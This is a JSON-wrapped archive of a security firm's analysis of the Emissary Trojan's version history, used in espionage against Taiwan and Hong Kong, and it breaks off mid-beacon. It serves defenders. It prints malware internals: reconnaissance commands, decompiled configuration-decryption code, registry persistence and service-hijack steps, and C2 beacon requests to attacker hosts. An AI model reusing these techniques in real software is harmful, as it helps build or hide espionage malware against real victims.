{ "id": "25b45f83-b1e6-4d01-bb85-639f82208811", "created_at": "2026-04-06T00:18:53.275632Z", "updated_at": "2026-04-10T03:34:27.574163Z", "deleted_at": null, "sha1_hash": "93269fb4566d06a8bc741fe1498cf33c5ce5a9bc", "title": "Emissary Trojan Changelog: Did Operation Lotus Blossom Cause It to Evolve?", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 384121, "plain_text": "Emissary Trojan Changelog: Did Operation Lotus Blossom Cause\r\nIt to Evolve?\r\nBy Robert Falcone, Jen Miller-Osborn\r\nPublished: 2016-02-03 · Archived: 2026-04-05 18:53:58 UTC\r\nIn December 2015, Unit 42 published a blog about a cyber espionage attack using the Emissary Trojan as a\r\npayload. Emissary is related to the Elise Trojan and the Operation Lotus Blossom attack campaign, which\r\nprompted us to start collecting additional samples of Emissary.\r\nThe oldest sample we found was created in 2009, indicating this tool has been in use for almost seven years. Of\r\nnote, this is three years earlier than the oldest Elise sample we have found, suggesting this group has been active\r\nlonger than previously documented. In addition, Emissary appears to only be used against Taiwanese or Hong\r\nKong based targets, all of the decoys are written in Traditional Chinese, and they use themes related to the\r\ngovernment or military.\r\nWe also found several different versions of Emissary that had several iterative changes that show how the Trojan\r\nevolved over the years. One of the most interesting observations made during this analysis is that the amount of\r\ndevelopment effort devoted to Emissary significantly increased after we published our Operation Lotus Blossom\r\nreport in June 2015, resulting in many new versions of the Emissary Trojan. In addition, we observed a TTP shift\r\npost publication with regards to their malware delivery; they started using compromised but legitimate domains to\r\nserve their malware. Interestingly, the C2 infrastructure is also somewhat different than that used by Elise.\r\nTargeting\r\nIn contrast to Elise, which was used in attacks against multiple Southeast Asian countries in region appropriate\r\nlanguages, all of the Emissary decoys we’ve collected are written in Traditional Chinese, which is used primarily\r\nin Taiwan and Hong Kong. The targets we have identified are also limited to those two regions. Despite appearing\r\nto target a more limited geographical range, Emissary targeted the government, higher education, and high tech\r\ncompanies with a mix of copy and pasted news articles and documents that do not appear to be available online.\r\nDecoys include:\r\nAn Excel spreadsheet containing legitimate contact information for much of the Taiwanese government\r\nthat does not appear to be available online.\r\nCopy and paste of a news article where the Deputy Commander of the Nanjing Military region, Wang\r\nHuanguang, responds negatively to a 2014 magazine article from a respected US Taiwan scholar saying the\r\nodds of China and Taiwan reuniting is low and discussing the issues with an attempted military takeover.\r\nCopy of a news article from 2010 about the Chinese League of Victims protesting the involuntary removal\r\nof Shanghai residents in the lead up to the Shanghai Expo.\r\nCopy of the official Taiwan holiday schedule for 2016, which is the 105th anniversary of the current\r\nTaiwanese government.\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 1 of 26\n\nFigure 1: Partial screenshot of the response from Deputy Commander of the Nanjing Military Region Wang\r\nHuangguang.\r\nEvolve to Survive: TTP Shifts and Infrastructure\r\nWe’ve expanded our knowledge of Emissary infrastructure significantly since our first Emissary blog and we’ve\r\nfound almost exclusive use of Dynamic DNS (DDNS) domains with only one purchased from a Chinese reseller.\r\nIn contrast, the Elise samples used a mix of actor-registered and DDNS, with the actor-registered serving as one of\r\nthe data points we used to tie all of the activity together. While the use of DDNS can make tying activity together\r\nmore difficult, and despite the new Emissary variants since our publication, two of the most recent C2s resolved to\r\nIPs used by Elise C2s detailed in Operation Lotus Blossom. The Emissary samples typically have three hardcoded\r\nC2s that are a mix of IPs and domain names, with one of the domains or IPs not being used by the other three C2s\r\nin a likely effort to avoid loss of control. A full IOC list is included at the end of this report.\r\nAlso new is the actors’ use of compromised legitimate Taiwanese websites to serve their malware, including the\r\nofficial website of the Democratic Progressive Party. This is particularly interesting as Taiwan just held a closely\r\nwatched Presidential election on 16 January where DPP candidate Tsai Ing-wen won. This marked the first time a\r\nwoman was elected President of Taiwan and only the second time a member of the Kuomintang did not hold the\r\noffice since being ousted from China in 1949 when the Communist Party of China took power. In line with her\r\nparty’s stance, she is widely seen as a proponent of an independent Taiwan and not in favor of reunification with\r\nthe People’s Republic of China.\r\nMalware Updates\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 2 of 26\n\nOur evidence suggests that malware authors created Emissary as early as 2009, which suggests that threat actors\r\nhave relied on this tool as a payload in cyber-espionage attacks for many years. The Emissary Trojan is a capable\r\ntool to gain a foothold on a targeted system. While it lacks more advanced functionality like screen capturing, it is\r\nstill able to carry out most tasks desired by threat actors: exfiltration of files, ability to download and execute\r\nadditional payloads, and gain remote shell access. It appears that threat actors have continually used this Trojan,\r\nand developed several updated versions of Emissary to remain undetected and fresh over time.\r\nWe analyzed all of the known Emissary samples to determine what changes the malware author made between the\r\ndifferent versions of the Trojan. During our analysis, we examined when each sample was created based on its\r\ncompile time and produced a simple timeline, seen in Figure 2, to display the development efforts expended on the\r\nEmissary Trojan. It should be noted that we know some Emissary samples have been used multiple times with\r\ndifferent configurations, so the timeline only shows when development activity took place on Emissary and should\r\nnot be misconstrued to when Emissary was used in attacks.\r\nThe timeline in Figure 2 shows that the Emissary Trojan was first created (version 1.0) in May 2009 and quickly\r\nreceived an update that resulted in version 1.1 in June 2009. The Trojan did not receive much in the form of\r\nupdates until September 2011 when the author released version 2.0. Version 2.0 received one update in October\r\n2013 before the malware author released version 3.0 in December 2014. The malware author released version 4.0\r\nin March 2015, but curiously created a version 3.0 sample afterwards on June 26, 2015, which was out-of-sequence from the incrementing versioning. Between August and November 2015 the malware author creates\r\nseveral new versions of Emissary, specifically 5.0, 5.1, 5.3 and 5.4 in a much more rapid succession compared to\r\ndevelopment process in earlier versions.\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 3 of 26\n\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 4 of 26\n\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 5 of 26\n\nFigure 2: Timeline of development efforts spent on Emissary\r\nThe out-of-sequence version 3.0 appears to be an early variant of version 5.0 based on significant similarities\r\n(discussed in the changelog section) that are not seen in the original version 3.0 and other earlier versions of\r\nEmissary. One campaign code associated with of the out-of-sequence version 3.0 sample was “3test”, suggesting\r\nthe malware author created it for testing purposes. The other campaign code associated with the out-of-sequence\r\nsample was “IC00001”, which could denote an attack payload as it appears to be a plausible code to describe a\r\ncampaign.\r\nWhile this may be coincidental, the out-of-sequence version 3.0 sample was created ten days after we published\r\nthe Operation Lotus Blossom paper that exposed the Elise Trojan that is closely related to Emissary. It is possible\r\nthat the threat actors were prompted to make malware changes in response to our research. Regardless of\r\ncausation, the rapid development of new versions of Emissary suggests that the malware authors are making\r\nfrequent modifications to evade detection, which as a corollary suggests the threat actors are actively using the\r\nEmissary Trojan as a payload in attacks.\r\nEmissary Changelog\r\nIn this section, we discuss the changes observed between each version of Emissary. As this section is focused on\r\nchanges, the features and functionality are the same between Emissary versions unless otherwise mentioned.\r\nVersion 1.0\r\nDate: 5/12/2009\r\nSHA256: a7d07b92e48876e2195e5d8769a47cf0a237e11ac304e41b14fc36042b0d9484 Original Name:\r\nWUMsvc.dll\r\nInitial Release\r\nThe initial loader Trojan writes Emissary to %SYSTEM%\\WSPsvc.dll and installs it as a service, which will run\r\nthe exported function \"ServiceMain\" within the Emissary Trojan to carry out its functionality.\r\nConfiguration data is stored in the last 1024 bytes of the payload, from which the Trojan will extract an 896 byte\r\nstructure. The configuration is decrypted with an algorithm that uses the XOR operation on each byte using the\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 6 of 26\n\nvalue at a different offset within the ciphertext.\r\nThe code will create the following registry keys:\r\nHKEY_CLASSES_ROOT\\Shell.LocalServer\\CheckCode\r\nHKEY_CLASSES_ROOT\\Shell.LocalServer\\CheckID\r\nEmissary uses the \"CheckCode\" registry key to store the encrypted configuration for the Trojan, while it stores a\r\nGUID that Emissary uses to uniquely identify the compromised host in the \"CheckID\" key.\r\nThe malware performs initial system information gathering and saves data to a file named TMP2548. The initial\r\ngathering relies on a combination of the following commands executed by the command prompt:\r\ncommands executed by the command prompt:\r\nECHO VER\r\nVER\r\nECHO IPCONFIG /ALL\r\nIPCONFIG /ALL\r\nECHO NET LOCALGROUP ADMINISTRATORS\r\nNET LOCALGROUP ADMINISTRATORS\r\nECHO NET START\r\nNET START\r\nECHO GPRESULT /Z\r\nGPRESULT /Z\r\nECHO GPRESULT                  /SCOPE COMPUTER /Z\r\nGPRESULT                     /SCOPE COMPUTER /Z\r\nECHO SYSTEMINFO\r\nSYSTEMINFO\r\nEmissary parses command and control responses for \"instru\", which will precede a GUID value that designates\r\nthe command the C2 server wishes to execute on the system. The command handler does not use a nested if/else\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 7 of 26\n\nor switch statement like most malware families, instead Emissary creates a structure that contains all of the\r\navailable command GUIDs that it will iterate through each time the C2 supplies a GUID in order to determine\r\nwhich command the operator wishes to execute. Emissary can include up to 32 different commands within this\r\ndata structure, but it appears the author has decided to include six commands within the Trojan. The following\r\ndenotes the command handler structure used by Emissary v1.0:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\nstruct EMISSARY_COMMAND\r\n{\r\n  CHAR guid[40];\r\n  DWORD sub_function;\r\n  DWORD arg1_subfunction;\r\n  DWORD arg2_subfunction;\r\n  DWORD arg3_subfunction;\r\n};\r\nstruct commandHandler\r\n{\r\n  DWORD number_of_commands;\r\n  DWORD unused;\r\n  struct EMISSARY_COMMAND cmd_0;\r\n  struct EMISSARY_COMMAND cmd_1;\r\n  struct EMISSARY_COMMAND cmd_2;\r\n  struct EMISSARY_COMMAND cmd_3;\r\n  struct EMISSARY_COMMAND cmd_4;\r\n  struct EMISSARY_COMMAND cmd_5;\r\n};\r\nTable 1 contains the commands available within the Emissary v1.0 command handler.\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 8 of 26\n\nCommand Description\r\nbac84b12-5b0b-491f-a885-8667d156394f\r\nUpload file.\r\n3d8313cc-53ca-4751-\r\nbbbf-ea5f914f8e65\r\nDownload file.\r\ndb0e93e7-b46c-4cba-81f1-ec70da57dc19\r\nUpdate config. C2 specifies files as: p1 = C2 server 1, p2 = C2 server 2, p3 = C2\r\nserver 3, p4 = Sleep Interval, p5 = System Identifier (computer name), p6 =\r\nGUID for beacon.\r\n2e382e51-3089-4293-\r\n8454-5eccb253eb54\r\nExecutes a specified command.\r\na57db08a-bf97-4b43-\r\nb27d-157e62e2fd74\r\nCreate remote shell.\r\neab5c1ab-a497-4fc2-\r\nbbe0-049be45d6f2d\r\nUpdate Trojan with new executable.\r\nTable 1: Emissary command handler\r\nThe Emissary version 1.0 beacon to the C2 server appears as follows:\r\nGET /VSNET/default.aspx HTTP/1.1\r\nUser-Agent: Mozilla/4.0\r\nHost: 193.34.144[.]21\r\nCookie: guid=af44f802-ba5c-4b3c-8c6b-2ea411058678; op=1635b097-ffe4-4711-89e6-7f8c7f4cdca6\r\nDate: 5/31/2009\r\nSHA256: e6c4611b1399ada920730686395d6fc1700fc39add3d0d40b4f784ccb6ad0c30, Original Name:\r\nWUMsvc.dll\r\nRemoved checks for \"//\" and \"/\" in the update configuration command when updating the three C2 servers.\r\nVersion 1.1\r\nDate: 6/5/2009\r\nSHA256: 931a1284b11a3997c7a99076d582ed3436aa30409dc73bd763436dddd490f9cb\r\nOriginal Name: WUMsvc.dll\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 9 of 26\n\nBug fixes:\r\nAdded code to make sure the content received from the C2 server matches the \"Content-Length\" value in\r\nthe HTTP response.\r\nCode added to allow for the download of more than 524,288 bytes.\r\nThe Emissary v1.1 C2 beacon appears as follows, which has not changed since version 1.0:\r\nGET /eng/comfunc/comfunc/default.aspx HTTP/1.1\r\nUser-Agent: Mozilla/4.0\r\nHost: 137.189.145.1\r\nCookie: guid=af44f802-ba5c-4b3c-8c6b-2ea411058678; op=1635b097-ffe4-4711-89e6-7f8c7f4cdca6\r\nVersion 2.0\r\nDate: 9/15/2011\r\nSHA256: 5edf2d0270f8e7eb5be3476802e46c578c4afc4b046411be0806b9acc3bfa099 Original Name:\r\nEmissaryDll.dll\r\nVersion 2.0 was a significant re-write of the Emissary Trojan.\r\nThe configuration data for the Trojan is still saved to the registry, but the registry key has changed to:\r\nSOFTWARE\\Microsoft\\VBA\\VbaData\r\nThe configuration structure also changed in size to 464 bytes. The Emissary configuration is now encrypted using\r\na custom algorithm that uses the \"srand\" function to seed the \"rand\" function using a value of 2563. This seed\r\nvalue causes the \"rand\" function to generate the same values each time, which Emissary will use as a key along\r\nwith the XOR operation. The configuration now contains the version number of Emissary, instead of the version\r\nbeing hardcoded into the Trojan.\r\nThis version of Emissary keeps track of which C2 location within its configuration that it has been communicating\r\nwith by storing the index of the C2 server (1, 2, or 3) in the following registry key:\r\nSOFTWARE\\Microsoft\\VBA\\VbaList\r\nThis version of Emissary moves away from the command handler using the structure and moves to a nested if/else\r\nstatement for less complicated command handling; however, the command GUID and commands themselves are\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 10 of 26\n\nunchanged.\r\nThe Emissary version 2.0 beacon changed slightly from previous versions, specifically the removal of the User-Agent field and the use of a lowercase \"h\" in the \"Host\" field. The following is an example of the version 2.0\r\nbeacon, which contains the same GUID and \"op\" values:\r\nGET /0test/test/default.aspx HTTP/1.1\r\nhost: 163.20.127.27\r\nCookie: guid=af44f802-ba5c-4b3c-8c6b-2ea411058678; op=1635b097-ffe4-4711-89e6-7f8c7f4cdca6;\r\nVersion 2.0 also introduces a debug message logging system that includes verbose error messages that are\r\naccompanied by an error ID number. Error messages are written to the file %TEMP%\\em.log. The following is a\r\nlist of all possible debug messages:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\nSource - Error ID - Debug Message\r\nemissarydll.cpp - 0x30 - InitApp() - Event already exists\r\nemissarydll.cpp - 0x35 - InitApp() - Event create successful\r\nemissarydll.cpp - 0x3b - InitApp() - create work thread\r\nshell.cpp - 0x30 - SendShellOutputThread - PeekNamedPipe - Error : 0x%08x\r\nshell.cpp - 0x3e - SendShellOutputThread() : Timeout\r\nshell.cpp - 0x53 - SendShellOutputThread - ReadFile - Error : 0x%08x\r\nshell.cpp - 0x5b - SendShellOutputThread - send - Error : 0x%08x\r\nshell.cpp - 0x62 - SendShellOutputThread() : thread exit\r\nshell.cpp - 0x7f - RecvShellCmdThread - recv - Error : 0x%08x\r\nshell.cpp - 0x89 - RecvShellCmdThread - WriteFile - Error : 0x%08x\r\nshell.cpp - 0x8f - RecvShellCmdThread() : thread exit\r\nshell.cpp - 0xeb - Error occured : %s [%d]\r\nshell.cpp - 0xfa - TerminateThread Input Thread\r\nshell.cpp - 0x100 - TerminateThread Output Thread\r\nshell.cpp - 0x118 - SocketShell - Fail To Create Reverse Socket\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 11 of 26\n\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\nshell.cpp - 0x12f - SocketShell - Fail To  Generate Reverse Shell\r\nshell.cpp - 0x13a - SocketShell - SocketShell - Fail To  Generate Reverse Shell\r\nshell.cpp - 0x13e - SocketShell - Create Reverse Shell Thread OK\r\nconfig.cpp - 0x38 - RegCreateKeyEx error : %0x08x\r\nconfig.cpp - 0x46 - RegSetValueEx error : %0x08x\r\nconfig.cpp - 0x5e - ReadConfig - RegCreateKeyEx error : 0x%08x\r\nconfig.cpp - 0x66 - ReadConfig - RegQueryValueEx error : 0x%08x\r\nconfig.cpp - 0xab - find user: %s\r\nconfig.cpp - 0xbc - can not find proxy\r\nconfig.cpp - 0xc7 - get ProxySetting failed\r\nconfig.cpp - 0xd4 - find proxy server : %s\r\nrun.cpp -      0x75 - InitConfig: [g_ServerPath:%s] [g_ServerName:%s] [g_port:%d] [g_ServerUrl:%s]\r\nrun.cpp - 0x9d - InitConfig: [g_DelayTime:%d]\r\nrun.cpp - 0xbe - get proxy the last time used:%s\r\nrun.cpp - 0xc3 - server index:%d\r\nrun.cpp - 0xd9 - RetryTimes = %d\r\nrun.cpp - 0xec - connect %s error :%s\r\nrun.cpp - 0x10c - process a request ok.\r\nhttpclient.cpp - 0x98 - ASP.NET_SessionId长度异常:[%d][%s] (translation: ASP.NET_SessionId\r\nLength Exception:[%d][%s])\r\nhttpclient.cpp - 0xd0 - ******not connected !\r\nhttpclient.cpp - 0xf4 - read hread error : %s\r\nhttpclient.cpp - 0x102 - body length = 0\r\nhttpclient.cpp - 0x13d - decrypt error\"\r\nhttpclient.cpp - 0x211 - instruction : \u003cinstruction\u003e\r\nhttpclient.cpp - 0x21d - no instruction guid\r\nhttpclient.cpp - 0x22c - OP_DOWNLOAD no local file name\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 12 of 26\n\n43\r\n44\r\n45\r\n46\r\n47\r\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\n54\r\n55\r\n56\r\n57\r\n58\r\n59\r\n60\r\n61\r\n62\r\n63\r\n64\r\nhttpclient.cpp - 0x23b - OP_UPLoad no local file name\r\nhttpclient.cpp - 0x249 - OP_UPLoad no local file name\r\nhttpclient.cpp - 0x242 - OP_UPLoad no local file name\r\nhttpclient.cpp - 0x25b - OP_EXECUTE no cmd list\r\nhttpclient.cpp - 0x262 - OP_EXECUTE no timeout\r\nhttpclient.cpp - 0x2b4 - OP_SHELL ip\r\nhttpclient.cpp - 0x2bb - OP_SHELL port\r\nhttpclient.cpp - 0x2dd - OP_CHANGECONFIG server1\r\nhttpclient.cpp - 0x2e4 - OP_CHANGECONFIG server2\r\nhttpclient.cpp - 0x2eb - OP_CHANGECONFIG server3\r\nhttpclient.cpp - 0x2f2 - OP_CHANGECONFIG timestr\r\nhttpclient.cpp - 0x2f9 - OP_CHANGECONFIG namestr\r\nhttpclient.cpp - 0x300 - OP_CHANGECONFIG guid\r\nhttpclient.cpp - 0x321 - not connected\r\nhttpclient.cpp - 0x361 - send msg error\r\nhttpdoinstruction.cpp - 0x28 - DownloadFile - LocalFileName=%s\r\nhttpdoinstruction.cpp - 0x5c - download file http head:%s\r\nhttpdoinstruction.cpp - 0x7a - download file ok\r\nhttpdoinstruction.cpp - 0xac - UploadFile - LocalFileName=%s\r\nhttpdoinstruction.cpp - 0xb4 - DownloadFile - Error - Open File [%S][0x%08x]\r\nhttpdoinstruction.cpp - 0xc7 - UploadFile:TotalLength=%d\r\nhttpdoinstruction.cpp - 0x124 - download file http head:%s\r\nDate: 10/24/2013\r\nSHA256: 9dab2d1b16eb0fb4ec2095d4b4e2a3ad67a707ab4f54f9c26539619691f103f3\r\nOriginal Name: NetPigeon_DLL.dll\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 13 of 26\n\nThis update to Emissary allowed the Trojan to run as a service. The configuration now contains settings for the\r\nEmissary service, which the Trojan will store in and access from the following registry keys:\r\nSOFTWARE\\Microsoft\\VBA\\Serv -\u003e Service Name\r\nSOFTWARE\\Microsoft\\VBA\\VbaList -\u003e Binary Path for the Service\r\nAlso, this version of Emissary was created using Microsoft Foundation Classes (MFC) to carry out a majority of\r\nits functionality. For instance, instead of manually building an HTTP request as in previous versions, this version\r\nuses the MFC functions to create the HTTP request and send it to the C2 server:\r\nCInternetSession::CInternetSession\r\nCInternetSession::GetHttpConnection\r\nCHttpConnection::OpenRequest\r\nCHttpFile::AddRequestHeaders\r\nCInternetSession::SetCookie\r\nCHttpFile::SendRequest\r\nUsing these classes creates a significantly different HTTP request sent to the C2 server, but the functionality of\r\nobtaining instructions from the C2 is the same. The following is an example of a beacon generated by this sample,\r\nwhich contains the same \"op\" value and has additional fields within the HTTP header:\r\nGET /lightserver/Default.aspx HTTP/1.0\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\nHost: groupspace.findhere.org\r\nCookie: guid=8E550BBD-F5DB-4471-BBC7-E8768BD5003E; op=1635b097-ffe4-4711-89e6-\r\n7f8c7f4cdca6\r\nThe logging functionality within this update no longer includes error ID values, but still contains verbose debug\r\nmessages that are written to a file named %TEMP%\\msmqinst.ax.\r\nVersion 3.0\r\nDate: 12/24/2014\r\nSHA256: dcbeca8c92d6d18f2faf385e677913dc8abac3fa3303c1f5cfe166180cffbed3\r\nOriginal Name: Generic.dll\r\nBug fixes:\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 14 of 26\n\nAdded a function to the configuration update command that checks to see if the C2 provided a new sleep\r\ninterval at offset 460 and uses the interval stored in the VbaData registry key if its missing. This fixes the\r\nbug that would not allow the sleep interval to update correctly.\r\nVersion 4.0\r\nDate: 3/26/2015\r\nSHA256: 5171c9a593389011da4d72125e52bf7ef86b2da7fcd6c2a2bc95467afe6a1b58\r\nOriginal Name: Generic.dll\r\nThis version of Emissary includes both the installation and loading functionality along with the Emissary\r\nfunctional code in the same file. The installation and loading portion of the Trojan is called using an exported\r\nfunction named \"Setting\", which moves the file to:\r\nThe loading portion of this version of Emissary checks the permissions of the current user and either installs\r\nEmissary as a service or as a standalone Trojan. To install as a service, the loader will enumerate the services on\r\nthe system looking for services running under the \"netsvcs\" group, and it will attempt to hijack the first \"netsvcs\"\r\nservice by replacing the \"ServiceDLL\" parameter to point to the Emissary DLL. For instance, during the analysis\r\nperiod, the installation code changed the following registry key of the AppMgmt:\r\nHKLM\\SYSTEM\\CurrentControlSet\\Services\\AppMgmt\\Parameters\\ServiceDll:\r\n\"%SystemRoot%\\System32\\appmgmts.dll\"\r\nto\r\nHKLM\\SYSTEM\\CurrentControlSet\\Services\\AppMgmt\\Parameters\\ServiceDll:\r\n\"C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\Remdisk.dll\"\r\nIf the user does not have permissions to add a service, the installation routine attempts to add persistence by\r\ncreating the following registry key that will run the functional code within Emissary via an exported function\r\nnamed \"DllRegister\":\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Run\\Resolves: \"Rundll32.exe\r\nC:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\Remdisk.dll,DllRegister\"\r\nThis version of emissary has its configuration appended to the end of the DLL, specifically starting at offset\r\n0xc600. The following code accesses the configuration embedded within the DLL and decrypts it using a single\r\nbyte XOR algorithm using 65 as the key:\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 15 of 26\n\nSetFilePointer(v2, 0xC600, 0, 0);\r\nReadFile(h_emissary_dll_file, buffer_for_config, 0x1D0u, \u0026NumberOfBytesRead, 0);\r\niteration_count = 0;\r\ndo\r\n  *(iteration_count++ + buffer_for_config) += 65;\r\nwhile ( iteration_count \u003c 0x1D0 );\r\nThis algorithm differs from the algorithm introduced in Emissary version 2.0 that used the srand and rand\r\nfunctions to generate a key to use in conjunction with the XOR operation. With the configuration embedded\r\nwithin the Emissary DLL, each Emissary version 4.0 sample will have a different hash as the configuration data\r\nchanges.\r\nThe network beacon sent from Emissary version 4.0 is the same as other previous versions starting at version 2.0,\r\nas seen in the following:\r\nGET /lightserver/Default.aspx HTTP/1.0\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\nHost: 210.209.121.92\r\nCookie: guid=7DA53AE4-C155-40b3-8EB3-60C4FCE99025; op=1635b097-ffe4-4711-89e6-\r\n7f8c7f4cdca6\r\nVersion 3.0: Out-of-sequence\r\nDate: 6/25/2015\r\nSHA256: 70bed57bc3484fe5dbcf3c732bd7b11f80a742138f4733bc7e9b6d03e721da4a\r\nOriginal Name: IISDLL.dll\r\nMajor Overhaul\r\nThe compilation time of one sample of Emissary version 3.0 on June 25, 2015 appears out of order, as it occurs\r\nafter the compilation of Emissary version 4.0. The differences between this out of order sample compared to the\r\nother known version 3.0 sample, as well as version 4.0 for that matter, include a dramatic change in configuration\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 16 of 26\n\nstorage and the handling of commands. Also, the files stored on the system have different names than Emissary\r\nversions in the past, which are:\r\n%TEMP%\\000IISA758C8FEAE5F.TMP -\u003e Log file\r\n%APPDATA%\\LocalData\\75BD50EC.DAT -\u003e Configuration file\r\n%APPDATA%\\LocalData\\A08E81B411.DAT -\u003e Emissary DLL\r\nThis version of Emissary is designed to be injected into an Internet Explorer process by its associated loader\r\nTrojan, which marks the first time Emissary executes through DLL injection.\r\nThis version of Emissary also has a different configuration structure than prior versions. The configuration is no\r\nlonger stored in the registry; rather it is saved to a file named 75BD50EC.DAT. The Emissary DLL will skip to\r\noffset 0x488 within this file and read the next 132 bytes, which it will decrypt with a new algorithm as seen in the\r\nfollowing:\r\nSetFilePointer(h_config_file_1, 0x488, 0, 0);\r\nReadFile(h_config_file, buffer_for_config, 132u, \u0026NumberOfBytesRead, 0);\r\nCloseHandle(h_config_file);\r\nsrand(0xA03u);\r\niteration_count = 0;\r\ndo\r\n  *(buffer_for_config + iteration_count++) ^= rand() % 128;\r\nwhile ( iteration_count \u003c 0x84 );\r\nThe configuration structure has also changed as well, with Emissary now using the following structure:\r\nstruct emissary_new_config {\r\nWORD Emissary_version_major;\r\nWORD Emissary_version_minor;\r\nCHAR[36] GUID_for_sample;\r\nWORD Unknown1;\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 17 of 26\n\nCHAR[128] Server1;\r\nCHAR[128] Server2;\r\nCHAR[128] Server3;\r\nCHAR[128] CampaignName;\r\nCHAR[550] Unknown2;\r\nWORD Delay_interval_seconds;\r\n};\r\nThis version of Emissary also introduced a new command handler that uses number-based commands instead of\r\nthe GUID commands seen in prior versions of Emissary. The functionality of the commands are the same,\r\nhowever, the commands themselves are invoked using a number. Table 2 contains a list of available commands\r\nand a brief description of the functionality carried out by the command.\r\nCommand Description\r\n102 Upload a file to the C2 server.\r\n103 Executes a specified command.\r\n104 Download file from the C2 server.\r\n105 Update configuration file.\r\n106 Create a remote shell.\r\n107 Updates the Trojan with a new executable.\r\nTable 2: New Emissary command handler\r\nThe network beacon sent from this version of Emissary is very similar to the beacon first introduced in Emissary\r\nversion 2.0; however, the \"op\" value of \"101\" is hardcoded for the beacon and replaces the GUID based op\r\ndesignator to match the new command handler. The following is an example of the network beacon generated by\r\nthis version of Emissary:\r\nGET /default.aspx HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\nHost: 101.55.33.92\r\nCache-Control: no-cache\r\nhttps://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\r\nPage 18 of 26\n\nCookie: guid=cae5e213-395a-4023-9a12-f78d3c4718e5; op=101\nVersion 5.0\nDate: 8/25/2015\nSHA256: c145bb2e4ce77c79aa01de2aec4a8b5b0b680e23bceda2c230903b5f0e119634, Original Name:\nWinDLL.dll\nEmissary version 5.0 closely resembles the out-of-order version 3.0 sample, which suggests that the malware\nauthor just forgot to change the version number of the out of order sample. While the configuration and Emissary\nDLL filenames used by the version 5.0 Emissary sample are the same as the out-of-order version 3.0 sample, the\nlog file name differs but only slightly, as seen in the following list of related files:\n%TEMP%\\000A758C8FEAE5F.TMP -\u003e Log File\n%APPDATA%\\LocalData\\75BD50EC.DAT -\u003e Configuration file\n%APPDATA%\\LocalData\\A08E81B411.DAT -\u003e Emissary DLL\n%APPDATA%\\LocalData\\ishelp.dll -\u003e Loader DLL\nVersion 5.0 uses numbers within its command handler and the same configuration structure as the out-of-order\nversion 3.0. The only major change in 5.0 is the ability to obtain a compromised system's external IP address by\nperforming an HTTP GET request to \"http://showip.net/index.php\". The code will parse the response from this\nwebserver for the following to obtain the system's IP address:\nThe SID value sent from the C2 server is encrypted using an algorithm that uses the XOR operation on the data\nusing 0x76 as the key on the first byte and the resulting cleartext byte as the key on the next byte and so on. The\nnetwork beacon sent from this version of Emissary visually resembles the out-of-order version, with the addition\nof a field \"SHO\" that contains the IP address of the compromised host. The following is an example of the\nEmissary version 5.0 network beacon, which is also the same in versions 5.1, 5.3 and 5.4 as well:\nGET /default.aspx HTTP/1.1\nUser-Agent: Mozilla/4.0 